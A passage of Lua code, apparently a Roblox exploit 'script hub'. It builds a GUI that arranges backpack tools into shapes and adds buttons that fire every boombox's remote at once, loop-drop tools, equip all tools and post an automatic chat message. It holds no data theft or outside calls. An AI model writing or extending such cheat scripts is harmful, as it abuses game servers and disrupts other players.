plr.Character Tools[2].Grip = CFrame.new(0.7, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(2.5, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4.3, -1.2, -0.2) * CFrame.Angles(1.6, math.rad(-98),1.6) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.5, -1.6, -0.2) * CFrame.Angles(1.6, math.rad(-250),1.6) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(6, -2.55, -0.2) * CFrame.Angles(1.6, math.rad(-115),1.6) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(1.55, 7.2, 0.1) * CFrame.Angles(1.6, math.rad(-10),1.6) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-1.1, -1.2, -0.23) * CFrame.Angles(1.6, math.rad(-98),1.57) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-2.8, -1.17, -0.17) * CFrame.Angles(1.6, math.rad(-99),1.6) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(0, 2.7, -0.2) * CFrame.Angles(1.575, math.rad(-175),1.575) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-4.6, -1.1, -0.17) * CFrame.Angles(1.6, math.rad(-100),1.6) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(-6.3, -1.1, -0.17) * CFrame.Angles(1.6, math.rad(-100),1.6) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(-1, 6, -0.45) * CFrame.Angles(1.6, math.rad(-205),1.4) Tools[13].Parent = plr.Character end) sword.Name = "sword" sword.Parent = ScrollingFrame sword.BackgroundColor3 = Color3.fromRGB(0, 0, 0) sword.Position = UDim2.new(0.0159999728, 0, 0.111905873, 0) sword.Size = UDim2.new(0, 185, 0, 40) sword.Font = Enum.Font.Nunito sword.Text = "Sword (10)" sword.TextColor3 = Color3.fromRGB(255, 255, 255) sword.TextScaled = true sword.TextSize = 14.000 sword.TextWrapped = true sword.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.15, 1.7, -0.02) * CFrame.Angles(1.58, math.rad(90), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(3, -0.9, -0.05) * CFrame.Angles(1.58, math.rad(-45), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-3.1, -0.67, -0.049) * CFrame.Angles(1.58, math.rad(-135), 1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(2.2, -0.3, -0.03) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(4.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(6.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(8.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(10.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(12.2, -0.3, 0) * CFrame.Angles(1.58, math.rad(-360), 1.58) Tools[10].Parent = plr.Character end) pickaxe.Name = "pickaxe" pickaxe.Parent = ScrollingFrame pickaxe.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pickaxe.Position = UDim2.new(0.671999931, 0, 0.0141494647, 0) pickaxe.Size = UDim2.new(0, 185, 0, 40) pickaxe.Font = Enum.Font.Nunito pickaxe.Text = "Pickaxe (8)" pickaxe.TextColor3 = Color3.fromRGB(255, 255, 255) pickaxe.TextScaled = true pickaxe.TextSize = 14.000 pickaxe.TextWrapped = true pickaxe.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-0.4, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-2.7, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-4.5, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-6.3, 0.6, 0) * CFrame.Angles(1.6, math.rad(-180), 1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-0.3, 6.85, -0.4) * CFrame.Angles(38.5, math.rad(-270), 2.3) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(1.8, 6.85, -0.4) * CFrame.Angles(38.5, math.rad(-270), 2.3) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(3.3, 5.4, 0.32) * CFrame.Angles(1.6, math.rad(-320), 1.6) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.42, 6.6, 0.32) * CFrame.Angles(1.6, math.rad(-220), 1.6) Tools[8].Parent = plr.Character end) railgun.Name = "railgun" railgun.Parent = ScrollingFrame railgun.BackgroundColor3 = Color3.fromRGB(0, 0, 0) railgun.Position = UDim2.new(0.342399985, 0, 0.111905873, 0) railgun.Size = UDim2.new(0, 185, 0, 40) railgun.Font = Enum.Font.Nunito railgun.Text = "Railgun (23)" railgun.TextColor3 = Color3.fromRGB(255, 255, 255) railgun.TextScaled = true railgun.TextSize = 14.000 railgun.TextWrapped = true railgun.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(1.1, -1.2, 0) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.7, -1.2, 0.02) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(4.5, -2.34, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, 5.1, -0.07) * CFrame.Angles(-1.58, math.rad(-180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-5.6, 0.9, -0.07) * CFrame.Angles(-1.58, math.rad(-305), -1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-1.29, 3.5, -0.07) * CFrame.Angles(-1.58, math.rad(-262), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(4, 1, -0.07) * CFrame.Angles(-1.58, math.rad(-193), -1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.8, -0.8, 0) * CFrame.Angles(-1.58, math.rad(-25), -1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(0.8, 4.8, -0.07) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-2.3, -3.8, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-3, -3.8, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(3, 4.8, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[12].Parent = plr.Character end) railgunv2.Name = "railgun v2" railgunv2.Parent = ScrollingFrame railgunv2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) railgunv2.Position = UDim2.new(0.671999991, 0, 0.111905873, 0) railgunv2.Size = UDim2.new(0, 185, 0, 40) railgunv2.Font = Enum.Font.Nunito railgunv2.Text = "Railgun v2 (23)" railgunv2.TextColor3 = Color3.fromRGB(255, 255, 255) railgunv2.TextScaled = true railgunv2.TextSize = 14.000 railgunv2.TextWrapped = true railgunv2.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(1.1, -1.2, 0) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.7, -1.2, 0.02) * CFrame.Angles(-1.58, math.rad(-108), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(4.5, -2.34, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, 5.1, -0.07) * CFrame.Angles(-1.58, math.rad(-180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-5.6, 0.9, -0.07) * CFrame.Angles(-1.58, math.rad(-305), -1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-1.29, 3.5, -0.07) * CFrame.Angles(-1.58, math.rad(-262), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(4, 1, -0.07) * CFrame.Angles(-1.58, math.rad(-193), -1.58) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.8, -0.8, 0) * CFrame.Angles(-1.58, math.rad(-25), -1.58) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(0.8, 4.8, -0.07) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(0.6, -2.8, 0) * CFrame.Angles(-1.58, math.rad(-80), -1.58) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-7.3, -2.3, 0) * CFrame.Angles(-1.58, math.rad(-45), -1.58) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(1.2, 3.95, -0.062) * CFrame.Angles(-1.58, math.rad(45), -1.58) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(4.3, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(-4.3, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(6.6, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-6.6, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(8.8, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(-8.8, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(11, 5.3, -0.075) * CFrame.Angles(-1.58, math.rad(-270), -1.58) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(-11, -3.5, 0) * CFrame.Angles(-1.58, math.rad(-90), -1.58) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(3.7, 4.2, -0.075) * CFrame.Angles(-1.58, math.rad(-250), -1.58) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(-0.8, -4.1, 0) * CFrame.Angles(-1.58, math.rad(250), -1.58) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(-0.7, -0.2, -0.2) * CFrame.Angles(1.57, math.rad(-270), 0) Tools[23].Parent = plr.Character end) pc.Name = "pc" pc.Parent = ScrollingFrame pc.BackgroundColor3 = Color3.fromRGB(0, 0, 0) pc.Position = UDim2.new(0.0159999728, 0, 0.208059728, 0) pc.Size = UDim2.new(0, 185, 0, 40) pc.Font = Enum.Font.Nunito pc.Text = "PC (11)" pc.TextColor3 = Color3.fromRGB(255, 255, 255) pc.TextScaled = true pc.TextSize = 14.000 pc.TextWrapped = true pc.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.8, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-0.8, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(3, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-3, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(5.2, 1.5, 0) * CFrame.Angles(1.575, math.rad(-180), 3.1) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-5.2, -0.6, 0) * CFrame.Angles(1.575, math.rad(0), 3.1) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(1.1, 2.5, -2.95) * CFrame.Angles(1.575, math.rad(180), 4.68) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-2.2, -3, -2.17) * CFrame.Angles(3.13, math.rad(0), 3.1) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-4, -3, -2.1699) * CFrame.Angles(3.13, math.rad(0), 3.1) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(2.2, 3.9, -2.26) * CFrame.Angles(3.13, math.rad(0), -0.04) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(4, 3.9, -2.26) * CFrame.Angles(3.13, math.rad(0), -0.04) Tools[11].Parent = plr.Character end) arm.Name = "arm" arm.Parent = ScrollingFrame arm.BackgroundColor3 = Color3.fromRGB(0, 0, 0) arm.Position = UDim2.new(0.342399985, 0, 0.208059728, 0) arm.Size = UDim2.new(0, 185, 0, 40) arm.Font = Enum.Font.Nunito arm.Text = "Boombox Arm (4)" arm.TextColor3 = Color3.fromRGB(255, 255, 255) arm.TextScaled = true arm.TextSize = 14.000 arm.TextWrapped = true arm.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0.6, -0.1, -0.4) * CFrame.Angles(1.58, math.rad(-90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.6, -0.1, -0.3625) * CFrame.Angles(1.58, math.rad(-90), 1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(0.6, -0.1, -0.359) * CFrame.Angles(0, math.rad(-90), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(0.6, -0.1, -0.4) * CFrame.Angles(0, math.rad(-90), -3.15) Tools[4].Parent = plr.Character end) phone.Name = "phone" phone.Parent = ScrollingFrame phone.BackgroundColor3 = Color3.fromRGB(0, 0, 0) phone.Position = UDim2.new(0.671999991, 0, 0.208059728, 0) phone.Size = UDim2.new(0, 185, 0, 40) phone.Font = Enum.Font.Nunito phone.Text = "Phone (6)" phone.TextColor3 = Color3.fromRGB(255, 255, 255) phone.TextScaled = true phone.TextSize = 14.000 phone.TextWrapped = true phone.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(2.5, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-2.5, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(1, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-4, 0.5, 0) * CFrame.Angles(0.2, math.rad(-180), 58.1) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(4, -0, 0) * CFrame.Angles(-0.2, math.rad(-180), -58.13) Tools[6].Parent = plr.Character end) tophatx1.Name = "tophat x1" tophatx1.Parent = ScrollingFrame tophatx1.BackgroundColor3 = Color3.fromRGB(0, 0, 0) tophatx1.Position = UDim2.new(0.0159999728, 0, 0.301008463, 0) tophatx1.Size = UDim2.new(0, 185, 0, 40) tophatx1.Font = Enum.Font.Nunito tophatx1.Text = "Small TopHat" tophatx1.TextColor3 = Color3.fromRGB(255, 255, 255) tophatx1.TextScaled = true tophatx1.TextSize = 14.000 tophatx1.TextWrapped = true tophatx1.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character end) tophatx2.Name = "tophat x2" tophatx2.Parent = ScrollingFrame tophatx2.BackgroundColor3 = Color3.fromRGB(0, 0, 0) tophatx2.Position = UDim2.new(0.342399985, 0, 0.301008463, 0) tophatx2.Size = UDim2.new(0, 185, 0, 40) tophatx2.Font = Enum.Font.Nunito tophatx2.Text = "Large TopHat" tophatx2.TextColor3 = Color3.fromRGB(255, 255, 255) tophatx2.TextScaled = true tophatx2.TextSize = 14.000 tophatx2.TextWrapped = true tophatx2.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(6.3, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.3, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[5].Parent = plr.Character end) tophatx3.Name = "tophat x3" tophatx3.Parent = ScrollingFrame tophatx3.BackgroundColor3 = Color3.fromRGB(0, 0, 0) tophatx3.Position = UDim2.new(0.671999991, 0, 0.301008463, 0) tophatx3.Size = UDim2.new(0, 185, 0, 40) tophatx3.Font = Enum.Font.Nunito tophatx3.Text = "Tall TopHat" tophatx3.TextColor3 = Color3.fromRGB(255, 255, 255) tophatx3.TextScaled = true tophatx3.TextSize = 14.000 tophatx3.TextWrapped = true tophatx3.MouseButton1Down:Connect(function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.65, -1.9) * CFrame.Angles(1.58, math.rad(-180), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(3.65, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-3.625, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(6.3, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-6.3, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(9, -1.65, -1.7) * CFrame.Angles(1.58, math.rad(180), -1.58) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-9, -1.65, 1.25) * CFrame.Angles(1.58, math.rad(-180), 1.58) Tools[7].Parent = plr.Character end) UICorner_2.Parent = ScrollingFrame ToolHold.Name = "ToolHold" ToolHold.Parent = Frame ToolHold.BackgroundColor3 = Color3.fromRGB(0, 0, 0) ToolHold.Position = UDim2.new(0.329271078, 0, 1.01941407, 0) ToolHold.Size = UDim2.new(0, 200, 0, 50) ToolHold.Font = Enum.Font.SourceSans ToolHold.Text = "Remove tool holding while hold" ToolHold.TextColor3 = Color3.fromRGB(255, 255, 255) ToolHold.TextScaled = true ToolHold.TextSize = 14.000 ToolHold.TextWrapped = true ToolHold.MouseButton1Down:Connect(function() for i, v in pairs(game:GetService("Players").LocalPlayer.Character.Humanoid:GetPlayingAnimationTracks()) do v:Stop() end end) UICorner_4.Parent = ToolHold --dragging script local function CHUYME_fake_script() -- Frame.draggable local script = Instance.new('LocalScript', Frame) local UserInputService = game:GetService("UserInputService") local runService = (game:GetService("RunService")); local gui = script.Parent local dragging local dragInput local dragStart local startPos function Lerp(a, b, m) return a + (b - a) * m end; local lastMousePos local lastGoalPos local DRAG_SPEED = (12); -- // The speed of the UI darg. function Update(dt) if not (startPos) then return end; if not (dragging) and (lastGoalPos) then gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, lastGoalPos.X.Offset, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, lastGoalPos.Y.Offset, dt * DRAG_SPEED)) return end; local delta = (lastMousePos - UserInputService:GetMouseLocation()) local xGoal = (startPos.X.Offset - delta.X); local yGoal = (startPos.Y.Offset - delta.Y); lastGoalPos = UDim2.new(startPos.X.Scale, xGoal, startPos.Y.Scale, yGoal) gui.Position = UDim2.new(startPos.X.Scale, Lerp(gui.Position.X.Offset, xGoal, dt * DRAG_SPEED), startPos.Y.Scale, Lerp(gui.Position.Y.Offset, yGoal, dt * DRAG_SPEED)) end; gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position lastMousePos = UserInputService:GetMouseLocation() input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) runService.Heartbeat:Connect(Update) end coroutine.wrap(CHUYME_fake_script)() local function QYGCN_fake_script() -- Frame.close local script = Instance.new('LocalScript', Frame) local frame = script.Parent.Parent.Frame script.Parent.MouseButton1Click:Connect(function() frame.Visible = false end) end if game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents") then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Boombox Supreme powers loaded" ,"All") else end end }) Main:AddInput("TextboxIdentifier", { Title = "FE Play all boomboxes", Default = "Put Sound Id Here", Description = "Uses all the boomboxes in your inventory and plays them all at the same time", PlaceHolder = "Placeholder", Numeric = true, Finished = true, Callback = function(SoundId) local Settings = { [1] = "PlaySong", [2] = tonumber(SoundId) } for i, Boombox in next, game:GetService("Players").LocalPlayer:WaitForChild("Backpack"):GetChildren() do if (Boombox.Name == "Radio" or Boombox.Name == "Boombox") or (Boombox:FindFirstChild("Server") and Boombox:FindFirstChild("Client")) then Boombox.Parent = game:GetService("Players").LocalPlayer.Character Boombox.Remote:FireServer(unpack(Settings)) end end end }) Main:AddButton({ Title = "FE Loop drop tools", Description = "only works if u spawn in with the tool. click again to stop and it adds 1 tool each time", Callback = function() local oldposti = game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart").CFrame getgenv().lol = not getgenv().lol task.spawn(function() while true do task.wait() if not getgenv().lol then wait(10) game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart").CFrame = oldposti break end local tools = {} for i, v in pairs(game:GetService("Players").LocalPlayer:WaitForChild("Backpack"):GetDescendants()) do if v:IsA("Tool") then table.insert(tools, v) end end for _, tool in ipairs(tools) do toolPart = tool:FindFirstChildWhichIsA("Part") if toolPart then tool.Parent = game:GetService("Players").LocalPlayer.Character task.wait() tool.Parent = game:GetService("Workspace") task.wait() end end game:GetService("Players").LocalPlayer.Character:WaitForChild("Humanoid").Health = 0 wait(10) for i, v in pairs(game:GetService("Workspace"):GetChildren()) do if v:IsA("Tool") then game:GetService("Players").LocalPlayer.Character:WaitForChild("HumanoidRootPart").CFrame = v:FindFirstChildWhichIsA("Part").CFrame task.wait(0.25) end end wait(4) for i, v in pairs(game:GetService("Players").LocalPlayer.Character:GetChildren()) do if v:IsA("Tool") then v.Parent = game:GetService("Players").LocalPlayer:WaitForChild("Backpack") task.wait() end end wait(1) end end) end }) Main:AddButton({ Title = "FE equip all tools", Description = "equips all tools in backpack", Callback = function() for i,v in pairs(game:GetService("Players").LocalPlayer:WaitForChild("Backpack"):GetChildren()) do if v:IsA("Tool") then v.Parent = game:GetService("Players").LocalPlayer.Character end end end }) Main:AddButton({ Title = "FE 2006 Animations", Description = "FE animations from 2006 roblox", Callback = function() game:GetService("Players").LocalPlayer.Character:BreakJoints() game:GetService("Players").LocalPlayer.Character=nil Connection = game:GetService("Workspace").DescendantAdded:Connect(function(c) if c.Name == "Animate" then c.Disabled=true end end) repeat wait() until game:GetService("Players").LocalPlayer.Character Char = game:GetService("Players").LocalPlayer.Character Died = game:GetService("Players").LocalPlayer.Character:WaitForChild("Humanoid").Died:Connect(function() Connection:Disconnect() Died:Disconnect() end) wait(.1) function waitForChild(parent, childName) local child = parent:findFirstChild(childName) if child then return child end while true do child = parent.ChildAdded:wait() if child.Name==childName then return child end end end -- ANIMATION -- declarations local Figure = game:GetService("Players").LocalPlayer.Character local Torso = waitForChild(Figure, "Torso") local RightShoulder = waitForChild(Torso, "Right Shoulder") local LeftShoulder = waitForChild(Torso, "Left Shoulder") local RightHip = waitForChild(Torso, "Right Hip") local LeftHip = waitForChild(Torso, "Left Hip") local Neck = waitForChild(Torso, "Neck") local Humanoid = waitForChild(Figure, "Humanoid") local pose = "Standing" local toolAnim = "None" local toolAnimTime = 0 local jumpMaxLimbVelocity = 0.75 -- functions function onRunning(speed) if speed>0 then pose = "Running" else pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() pose = "Jumping" end function onClimbing() pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function onSwimming(speed) if speed>0 then pose = "Running" else pose = "Standing" end end function moveJump() RightShoulder.MaxVelocity = jumpMaxLimbVelocity LeftShoulder.MaxVelocity = jumpMaxLimbVelocity RightShoulder:SetDesiredAngle(3.14) LeftShoulder:SetDesiredAngle(-3.14) RightHip:SetDesiredAngle(0) LeftHip:SetDesiredAngle(0) end -- same as jump for now function moveFreeFall() RightShoulder.MaxVelocity = jumpMaxLimbVelocity LeftShoulder.MaxVelocity = jumpMaxLimbVelocity RightShoulder:SetDesiredAngle(3.14) LeftShoulder:SetDesiredAngle(-3.14) RightHip:SetDesiredAngle(0) LeftHip:SetDesiredAngle(0) end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder:SetDesiredAngle(3.14 /2) LeftShoulder:SetDesiredAngle(-3.14 /2) RightHip:SetDesiredAngle(3.14 /2) LeftHip:SetDesiredAngle(-3.14 /2) end function getTool() for _, kid in ipairs(Figure:GetChildren()) do if kid.className == "Tool" then return kid end end return nil end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end function animateTool() if (toolAnim == "None") then RightShoulder:SetDesiredAngle(1.57) return end if (toolAnim == "Slash") then RightShoulder.MaxVelocity = 0.5 RightShoulder:SetDesiredAngle(0) return end if (toolAnim == "Lunge") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightHip.MaxVelocity = 0.5 LeftHip.MaxVelocity = 0.5 RightShoulder:SetDesiredAngle(1.57) LeftShoulder:SetDesiredAngle(1.0) RightHip:SetDesiredAngle(1.57) LeftHip:SetDesiredAngle(1.0) return end end function move(time) local amplitude local frequency if (pose == "Jumping") then moveJump() return end if (pose == "FreeFall") then moveFreeFall() return end if (pose == "Seated") then moveSit() return end local climbFudge = 0 if (pose == "Running") then if (RightShoulder.CurrentAngle > 1.5 or RightShoulder.CurrentAngle < -1.5) then RightShoulder.MaxVelocity = jumpMaxLimbVelocity else RightShoulder.MaxVelocity = 0.15 end if (LeftShoulder.CurrentAngle > 1.5 or LeftShoulder.CurrentAngle < -1.5) then LeftShoulder.MaxVelocity = jumpMaxLimbVelocity else LeftShoulder.MaxVelocity = 0.15 end amplitude = 1 frequency = 9 elseif (pose == "Climbing") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 amplitude = 1 frequency = 9 climbFudge = 3.14 else amplitude = 0.1 frequency = 1 end desiredAngle = amplitude * math.sin(time*frequency) RightShoulder:SetDesiredAngle(desiredAngle + climbFudge) LeftShoulder:SetDesiredAngle(desiredAngle - climbFudge) RightHip:SetDesiredAngle(-desiredAngle) 